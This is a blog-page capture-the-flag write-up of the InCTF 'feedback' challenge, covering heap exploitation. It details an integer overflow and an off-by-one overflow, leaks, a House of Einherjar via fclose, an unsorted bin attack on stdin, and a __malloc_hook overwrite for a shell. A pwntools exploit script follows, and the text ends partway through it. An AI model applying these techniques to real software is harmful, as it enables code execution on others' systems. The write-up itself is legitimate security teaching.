<!DOCTYPE html>



<html lang="en" 
  
>

  <!--
  The Head
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="theme" content="Chirpy v2.7.1">

  <!-- Begin Jekyll SEO tag v2.7.1 -->
<meta name="generator" content="Jekyll v4.1.1" />
<meta property="og:title" content="InCTF: feedback Writeup" />
<meta name="author" content="Vignesh S Rao" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Unsorted bin attack on stdin’s _IO_buf_base" />
<meta property="og:description" content="Unsorted bin attack on stdin’s _IO_buf_base" />
<link rel="canonical" href="http://localhost:4000/posts/feedback/" />
<meta property="og:url" content="http://localhost:4000/posts/feedback/" />
<meta property="og:site_name" content="sherl0ck’s home" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2018-10-12T00:00:00+05:30" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="InCTF: feedback Writeup" />
<meta name="twitter:site" content="@sherl0ck__" />
<meta name="twitter:creator" content="@Vignesh S Rao" />
<meta name="google-site-verification" content="google_meta_tag_verification" />
<script type="application/ld+json">
{"headline":"InCTF: feedback Writeup","dateModified":"2020-12-31T20:26:34+05:30","datePublished":"2018-10-12T00:00:00+05:30","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/feedback/"},"url":"http://localhost:4000/posts/feedback/","author":{"@type":"Person","name":"Vignesh S Rao"},"description":"Unsorted bin attack on stdin’s _IO_buf_base","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


  <title>InCTF: feedback Writeup | sherl0ck's home
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://www.favicon-generator.org/
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2019 Cotes Chung
  Published under the MIT license
-->



<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">
<link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">

<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png">
<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png">
<link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png">

<link rel="icon" type="image/png" sizes="192x192"  href="/assets/img/favicons/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

<link rel="manifest" href="/assets/img/favicons/manifest.json">
<meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'>
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">


  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA -->
  

  <!-- jsDelivr CDN -->
  <link rel="preconnect" href="cdn.jsdelivr.net">
  <link rel="dns-prefetch" href="cdn.jsdelivr.net">

  <!-- Bootstrap -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
    integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous">

  <!-- Font Awesome -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"
    integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ="
    crossorigin="anonymous">

  <!--
  CSS selector for site.
  Chirpy v2.3
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT Licensed
-->






<link rel="preload" href="/assets/css/post.css" as="style">
<link rel="stylesheet" href="/assets/css/post.css">


  
    <link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css">
    <link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" />
  



  <!-- JavaScripts -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

  <script defer
    src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script>

  <!--
  JS selector for site.
  Chirpy v2.3
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT Licensed
-->





<script async src="/assets/js/post.min.js"></script>






</head>


  <body data-spy="scroll" data-target="#toc">

    <!--
  The Side Bar
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<div id="sidebar" class="d-flex flex-column align-items-end">

  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" alt="avatar" class="mx-auto">
        
        
        
        <img src="/assets/img/sample/avatar.jpg" alt="avatar" onerror="this.style.display='none'">
      </a>
    </div>

    <div class="site-title mt-3">
      <a href="/">sherl0ck's home</a>
    </div>

    <div class="site-subtitle font-italic">What is this life if, full of care, We have no time to stand and stare.</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">
    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/tabs/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/tabs/tags/" class="nav-link">
        <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i>
        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/tabs/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/tabs/about/" class="nav-link">
        <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
    


    <li class="nav-item">
      <a href="/resume.pdf" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>RESUME</span>
      </a>
    </li>

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center">

    
      

      
      <a href="https://github.com/vigneshsrao" aria-label="github"
        class="order-3"
        target="_blank" rel="noopener">
        <i class="fab fa-github-alt"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/sherl0ck__" aria-label="twitter"
        class="order-4"
        target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="
          javascript:location.href = 'mailto:' + ['vigneshsrao5','gmail.com'].join('@')" aria-label="email"
        class="order-5"
        >
        <i class="fas fa-envelope"></i>
      </a>
      

    
      

      
      <a href="/feed.xml" aria-label="rss"
        class="order-6"
        >
        <i class="fas fa-rss"></i>
      </a>
      

    

    
      
        <span class="icon-border order-2"></span>
      

      <span id="mode-toggle-wrapper" class="order-1">
        <!--
  Switch the mode between dark and light.

  v2.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->

<i class="mode-toggle fas fa-adjust"></i>

<script type="text/javascript">

  class ModeToggle {
    static get MODE_KEY() { return "mode"; }
    static get DARK_MODE() { return "dark"; }
    static get LIGHT_MODE() { return "light"; }

    constructor() {
      if (this.hasMode) {
        if (this.isDarkMode) {
          if (!this.isSysDarkPrefer) {
            this.setDark();
          }
        } else {
          if (this.isSysDarkPrefer) {
            this.setLight();
          }
        }
      }

      var self = this;

      /* always follow the system prefers */
      this.sysDarkPrefers.addListener(function() {
        if (self.hasMode) {
          if (self.isDarkMode) {
            if (!self.isSysDarkPrefer) {
              self.setDark();
            }

          } else {
            if (self.isSysDarkPrefer) {
              self.setLight();
            }
          }

          self.clearMode();
        }

        self.updateMermaid();
      });

    } /* constructor() */


    setDark() {
      $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
    }

    setLight() {
      $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
    }

    clearMode() {
      $('html').removeAttr(ModeToggle.MODE_KEY);
      sessionStorage.removeItem(ModeToggle.MODE_KEY);
    }

    get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); }

    get isSysDarkPrefer() { return this.sysDarkPrefers.matches; }

    get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; }

    get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; }

    get hasMode() { return this.mode != null; }

    get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); }

    /* get the current mode on screen */
    get modeStatus() {
      if (this.isDarkMode
        || (!this.hasMode && this.isSysDarkPrefer) ) {
        return ModeToggle.DARK_MODE;
      } else {
        return ModeToggle.LIGHT_MODE;
      }
    }

    updateMermaid() {
      if (typeof mermaid !== "undefined") {
        let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default");
        let config = { theme: expectedTheme };

        /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */
        $(".mermaid").each(function() {
          let svgCode = $(this).prev().children().html();
          $(this).removeAttr("data-processed");
          $(this).html(svgCode);
        });

        mermaid.initialize(config);
        mermaid.init(undefined, ".mermaid");
      }
    }

    flipMode() {
      if (this.hasMode) {
        if (this.isSysDarkPrefer) {
          if (this.isLightMode) {
            this.clearMode();
          } else {
            this.setLight();
          }

        } else {
          if (this.isDarkMode) {
            this.clearMode();
          } else {
            this.setDark();
          }
        }

      } else {
        if (this.isSysDarkPrefer) {
          this.setLight();
        } else {
          this.setDark();
        }
      }

      this.updateMermaid();

    } /* flipMode() */

  } /* ModeToggle */

  let toggle = new ModeToggle();

  $(".mode-toggle").click(function() {

    toggle.flipMode();

  });

</script>

      </span>
    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    <!--
  The Top Bar
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->
<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">
      
        
        <span>
          <a href="/">
            Posts
          </a>
        </span>
        
      

      
        <span>InCTF: feedback Writeup</span>
      

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->


<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->


<!-- Add attribute 'hide-bullet' to the checkbox list -->


<!-- return -->
<div class="row">

  <div id="post-wrapper" class="col-12 col-lg-11 col-xl-8">

    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

      <h1 data-toc-skip>InCTF: feedback Writeup</h1>

      <div class="post-meta text-muted d-flex flex-column">
        <!-- Published date and author -->
        <div>
          <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago "
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Fri, Oct 12, 2018, 12:00 AM +0530"
  >

  
  

  
    Oct 12, 2018
  

  <i class="unloaded">2018-10-12T00:00:00+05:30</i>

</span>
          by
          <span class="author">
            Vignesh S Rao
          </span>
        </div>

        <div>
          <!-- lastmod -->
          
          <span>
            Updated
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago lastmod"
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Thu, Dec 31, 2020,  8:26 PM +0530"
  >

  
  

  
    Dec 31
  

  <i class="unloaded">2020-12-31T20:26:34+05:30</i>

</span>
          </span>
          

          <!-- read time -->
          <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->






<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1545 words">8 min</span>


          <!-- page views -->
          

        </div>

      </div> <!-- .post-meta -->

      <div class="post-content">

        <!-- Using lozad. See: <https://github.com/ApoorvSaxena/lozad.js#usage> -->
        
          <p><strong>Attachments</strong>: <a href="/assets/img/feedback/feedback">binary</a>     <a href="/assets/img/feedback/libc.so.6">libc</a>     <a href="/assets/img/feedback/feedback.c">source</a></p>

<p>The binary is a non-stripped ELF 64 bit file. It is basically a kind of feedback accepting mechanism. Lets start with the permissions if the binary.</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>    <span class="nx">gdb</span><span class="o">-</span><span class="nx">peda$</span> <span class="nx">checksec</span>
    <span class="nx">CANARY</span>    <span class="p">:</span> <span class="nx">ENABLED</span>
    <span class="nx">FORTIFY</span>   <span class="p">:</span> <span class="nx">disabled</span>
    <span class="nx">NX</span>        <span class="p">:</span> <span class="nx">ENABLED</span>
    <span class="nx">PIE</span>       <span class="p">:</span> <span class="nx">ENABLED</span>
    <span class="nx">RELRO</span>     <span class="p">:</span> <span class="nx">FULL</span>
</pre></td></tr></tbody></table></code></div></div>

<p>And pretty much everything is enabled. Lets take a quick review of what all this binary is doing.</p>

<h2 id="reversing">Reversing</h2>

<p>Overview: This binary takes in ‘feedback’. We can create 4 drafts and also leave our name. We can ‘save’ only one of the drafts. After saving the draft, we have to provide some details and then are prompted to fill up a captcha.</p>

<p>I’ve added the source code along this post. So you can quickly go through that. Here’s a overview of the major functionalities.</p>

<ul>
  <li>
    <p><u>update_name</u> : This function is for creating/updating the <code class="language-plaintext highlighter-rouge">name</code>. In the first call, it mallocs a chunk of size 132 and allows us to write into the chunk. For all subsequent allocations, we can edit this chunk.</p>
  </li>
  <li><u>add_draft</u> : So, there’s this global array named <code class="language-plaintext highlighter-rouge">table</code> which can hold objects of the following structures -
    <div class="language-c highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="k">typedef</span> <span class="k">struct</span> <span class="n">draft</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">title</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">size</span><span class="p">;</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">feedback</span><span class="p">;</span>
<span class="p">}</span><span class="n">draft</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></div>    </div>
    <p><code class="language-plaintext highlighter-rouge">feedback</code> is a malloced chunk whose size we control. For size &gt; 0x500, 0x500 is set as size and for &lt; 0x80, 0x80 is set as the size.</p>
  </li>
  <li>
    <p><u>View</u> : allows us to view the details of the elements of the <code class="language-plaintext highlighter-rouge">table</code> array.</p>
  </li>
  <li>
    <p><u>Create feedback</u> : It opens the file <code class="language-plaintext highlighter-rouge">/home/feedback/ctffeedback</code> and assigns the files stream pointer to a global variable <code class="language-plaintext highlighter-rouge">fp</code>.</p>
  </li>
  <li>
    <p><u>Save Draft</u> : Asks for the draft id to save and then writes the contents of that draft to the file and frees the draft. Then mallocs a chunk of size 0x3c8 - 0x350 is for the team name and rest for the description. Finally it calls <code class="language-plaintext highlighter-rouge">terminate</code></p>
  </li>
  <li><u>terminate</u> : Generates a captcha and asks the user to confirm and then frees the <code class="language-plaintext highlighter-rouge">name</code> chunk and calls <code class="language-plaintext highlighter-rouge">exit</code>.</li>
</ul>

<h2 id="vulnerability">Vulnerability</h2>

<p>So there are 2 vulnerabilities. An integer overflow in <code class="language-plaintext highlighter-rouge">add</code> and a  one-byte-overflow in the <code class="language-plaintext highlighter-rouge">update_name</code> function. In <code class="language-plaintext highlighter-rouge">add</code>, if we give the size as a negative integer then it mallocs 0x80 but proceeds to write the negative value into the structure object. In the <code class="language-plaintext highlighter-rouge">update_name</code> function, while reading user input into the heap chunk, the user is free to imput a byte more than the chunk size. Thus we can control the last byte of the chunk that is immediately after the <code class="language-plaintext highlighter-rouge">name</code> chunk.</p>

<h2 id="memory-leaks">Memory Leaks</h2>

<p>Note that the <code class="language-plaintext highlighter-rouge">size</code> field is 64 bit long, -1 will be saved like 0xffff….(16 times) . Thus when we view the <code class="language-plaintext highlighter-rouge">title</code> we can leak the pointer to feedback chunk in heap. Thus we have a heap leak here.</p>

<p>Getting the libc leak requires a bit of work. We will use that one-byte overflow to null out the last bit of the next chunk, so that when the next chunk is freed, libc will think that the previous chunk is free and try to coleace these 2 chunks. Thus on the next malloc, we can get overlapping chunks and get libc leak. I’ve explained this in more detail in the following section.</p>

<h2 id="exploit">Exploit</h2>

<p>After getting a heap leak, and seeing that one-byte overflow, the first thing that comes to the mind is to perform a House of Einherjar. But there are a few obvious problems here. We have a call to malloc alright but the call to free does not come into picture until it’s too late. So let’s find a way to get around this.</p>

<p>First, a quick note about <code class="language-plaintext highlighter-rouge">fopen</code>. <code class="language-plaintext highlighter-rouge">fopen</code> open a new file stream and the space for that is allocated on the heap. While closing this stream, <code class="language-plaintext highlighter-rouge">fclose</code> internally calls <code class="language-plaintext highlighter-rouge">free</code> to destroy the file-structure object. We can use this call to <code class="language-plaintext highlighter-rouge">free</code> to set our House of Einherjar chain rolling.</p>

<p>Lets assume our heap layout looks something like this-</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>          draft1
         --------
          draft2
         --------
           name
         --------
        file-stream
</pre></td></tr></tbody></table></code></div></div>
<p>Now we can use the one-byte overflow to null out the last bit of the file-stream.</p>

<p>So, here comes the question of what we should coalesce our chunk with. Well, we can actually create a fake chunk inside a <code class="language-plaintext highlighter-rouge">draft</code> chunk and coalesce with that. Here we need a bit of math to get the chunk sizes correct.</p>

<p>The save function first frees the draft and then calls <code class="language-plaintext highlighter-rouge">fclose</code>. Lets say that our fake chunk is in <code class="language-plaintext highlighter-rouge">draft1</code> and we choose to <code class="language-plaintext highlighter-rouge">save</code> the same chunk. Thus this chunk is now freed. After this when <code class="language-plaintext highlighter-rouge">fclose</code> is called, the backward coalescing takes place and now this freshly freed chunk lies inside the previously freed <code class="language-plaintext highlighter-rouge">draft1</code> chunk.</p>

<p>Now next, we have a malloc of size 0x3c8 (for team name and description), which will be serviced from the unsorted bin (provided theres a chunk that satisfies the required size). Remember that the <code class="language-plaintext highlighter-rouge">draft1</code> chunk was freed first and it’s currently sitting at the top of the unsorted bin. If the size of this chunk matches the request by malloc, then this will be returned and the rest of the unsorted bin is left untouched. Also assuming that this happens, we have write access into a free chunk (the fake chunk that we created in <code class="language-plaintext highlighter-rouge">draft1</code> before it was freed).</p>

<p>Note that the first 0x350 bytes are for the team name and the rest for the description. And we can enter the team name multiple times (the loop quits only when we say we’re done). Thus, if we craft the fake chunk in such a way that it’s <code class="language-plaintext highlighter-rouge">prev_size</code> and <code class="language-plaintext highlighter-rouge">size</code> fields lie in the <code class="language-plaintext highlighter-rouge">team_name</code> chunk and the <code class="language-plaintext highlighter-rouge">fd</code> and <code class="language-plaintext highlighter-rouge">bk</code> pointers lie in the description chunk, then we can leak out the fd (a libc address) by fully filling the <code class="language-plaintext highlighter-rouge">team_name</code> chunk. In the second try, we again set the size of the fake chunk.</p>

<p>After we have the libc leak, things look better. With the description chunk, we can actually overwrite the <code class="language-plaintext highlighter-rouge">fd</code> and <code class="language-plaintext highlighter-rouge">bk</code> of the fake chunk, so as to do an unsorted bin attack. Note that, in <code class="language-plaintext highlighter-rouge">terminate</code> a chunk of size 0x40 is being malloced. If we overwrite the <code class="language-plaintext highlighter-rouge">bk</code> pointer of the fake chunk while entering the description, then an unsorted bin attack happens here.</p>

<p>So now the question is - what should be our target for the unsorted bin attack? We only have limited code after this. Notice that the captcha is being read with <code class="language-plaintext highlighter-rouge">scanf</code>. Thus if we target <code class="language-plaintext highlighter-rouge">_IO_buf_end</code> of <code class="language-plaintext highlighter-rouge">stdin</code> for unsorted bin attack, then it’ll be overwritten with a main arena address. So currently, our <code class="language-plaintext highlighter-rouge">stdin</code> buffer is starting from stdin’s <code class="language-plaintext highlighter-rouge">_shortbuf</code> all the way up to the pointer to top chunk. <code class="language-plaintext highlighter-rouge">__malloc_hook</code> lies in this buffer. And now in <code class="language-plaintext highlighter-rouge">scanf</code>, we can write into this buffer and overwrite <code class="language-plaintext highlighter-rouge">__malloc_hook</code> with a one_gadget.</p>

<p>So, where will <code class="language-plaintext highlighter-rouge">__malloc_hook</code> be called? Well, the name gets freed if the captcha is correct, but the issue is that the next chunk of <code class="language-plaintext highlighter-rouge">name</code> (the previously free file-structure object) has it’s last bit set to null. Thus <code class="language-plaintext highlighter-rouge">free</code> assumes that <code class="language-plaintext highlighter-rouge">name</code> is already free and is being double freed and thus <code class="language-plaintext highlighter-rouge">__malloc_hook</code> is called (<code class="language-plaintext highlighter-rouge">__malloc_hook</code> gets called in 2 cases - either on a <code class="language-plaintext highlighter-rouge">malloc</code> call or on double free). And we get a shell….:)</p>

<p>So we just need to get a proper heap layout with chunks of proper sizes, to create our exploit.</p>

<p>Here’s my exploit script</p>

<div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
</pre></td><td class="rouge-code"><pre>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">HOST</span><span class="o">=</span><span class="s">'18.224.70.88'</span>
<span class="n">PORT</span><span class="o">=</span><span class="mi">1337</span>

<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span><span class="o">&gt;</span><span class="mi">1</span><span class="p">:</span>
    <span class="n">r</span><span class="o">=</span><span class="n">remote</span><span class="p">(</span><span class="n">HOST</span><span class="p">,</span><span class="n">PORT</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
    <span class="n">r</span><span class="o">=</span><span class="n">process</span><span class="p">(</span><span class="s">'./feedback'</span><span class="p">,</span><span class="n">env</span><span class="o">=</span><span class="p">{</span><span class="s">"LD_PRELOAD"</span><span class="p">:</span><span class="s">"./libc.so"</span><span class="p">})</span>

<span class="n">libc</span><span class="o">=</span><span class="n">ELF</span><span class="p">(</span><span class="s">"./libc.so"</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">menu</span><span class="p">(</span><span class="n">opt</span><span class="p">):</span>
    <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Enter choice &gt;&gt; "</span><span class="p">,</span><span class="nb">str</span><span class="p">(</span><span class="n">opt</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">leave_name</span><span class="p">(</span><span class="n">name</span><span class="p">,</span><span class="n">line</span><span class="o">=</span><span class="bp">True</span><span class="p">):</span>
    <span class="n">menu</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">line</span><span class="p">:</span>
        <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Enter Name: "</span><span class="p">,</span><span class="n">name</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">r</span><span class="p">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s">"Enter Name: "</span><span class="p">,</span><span class="n">name</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">add_draft</span><span class="p">(</span><span class="n">title</span><span class="p">,</span><span class="n">size</span><span class="p">,</span><span class="n">feedback</span><span class="p">,</span><span class="n">line</span><span class="o">=</span><span class="bp">True</span><span class="p">):</span>
    <span class="n">menu</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">line</span><span class="p">:</span>
        <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Enter draft title: "</span><span class="p">,</span><span class="n">title</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">r</span><span class="p">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s">"Enter draft title: "</span><span class="p">,</span><span class="n">title</span><span class="p">)</span>
    <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Enter size of draft: "</span><span class="p">,</span><span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span>
    <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Give your feedback: "</span><span class="p">,</span><span class="n">feedback</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">view</span><span class="p">():</span>
    <span class="n">menu</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">create</span><span class="p">():</span>
    <span class="n">menu</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">save</span><span class="p">():</span>

    <span class="s">''' libc leak + unsortedbin attack '''</span>

    <span class="n">menu</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
    <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Enter draft id to save: "</span><span class="p">,</span><span class="s">'1'</span><span class="p">)</span>
    <span class="n">r</span><span class="p">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s">"Enter Team Name and Details: "</span><span class="p">,</span><span class="s">"A"</span><span class="o">*</span><span class="mh">0x350</span><span class="p">)</span>
    <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Team: "</span><span class="o">+</span><span class="p">(</span><span class="s">"A"</span><span class="o">*</span><span class="mi">350</span><span class="p">))</span>
    <span class="n">libc</span><span class="p">.</span><span class="n">address</span><span class="o">=</span><span class="n">u64</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">).</span><span class="n">strip</span><span class="p">().</span><span class="n">replace</span><span class="p">(</span><span class="s">"A"</span><span class="p">,</span><span class="s">''</span><span class="p">).</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">))</span><span class="o">-</span><span class="mh">0x3c4b78</span><span class="c1">#-0x3c1b58
</span>    <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"libc @ "</span><span class="o">+</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="n">address</span><span class="p">))</span>
    <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Confirm? &lt;y/n&gt;: "</span><span class="p">,</span><span class="s">'n'</span><span class="p">)</span>
